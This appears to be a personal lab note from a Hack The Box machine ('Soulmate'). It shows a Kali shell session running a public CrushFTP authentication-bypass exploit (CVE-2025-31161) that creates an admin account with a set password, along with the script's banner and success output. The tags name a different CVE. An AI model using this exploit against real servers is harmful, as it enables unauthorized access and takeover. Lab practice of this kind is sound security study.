created: "2025-11-02 22:35"
tags:
- CrushFTP
- CVE-2025-54309
- Authentication-Bypass
aliases:
- CVE-2025-54309
Type:
title:
updated: "2025-11-02 22:36"
┌┌──(root㉿kali)-[~/Desktop/htb/Soulmate/CVE-2025-31161]
└─# python3 CVE-2025-31161.py --target_host ftp.soulmate.htb --port 80 --new_user admin --password Admin123
_____________ _______________ _______________ ________ .________ ________ ____ ____ ____________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ \_____ \/_ /_ |/ _____/_ |
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ _(__ < | || / __ \ | |
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \| || \ |__\ \| |
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ /|___||___|\_____ /|___|
\/ \/ \/ \/ \/ \/ \/ \/
Author: Gaurav Bhattacharjee (G4UR4V007)
CVE-2025-31161 - CrushFTP User Creation Authentication Bypass Exploit
Description:
This vulnerability allows an attacker to create a new user account on CrushFTP
without proper authentication by sending crafted XML payloads to the WebInterface.
This can lead to unauthorized access and potential full compromise of the server.
[+] Preparing Payloads
[-] Warming up the target...
[-] Target is up and running
[+] Sending Account Create Request
[!] User created successfully!
[+] Exploit Complete! You can now login with:
[*] Username: admin
[*] Password: Admin123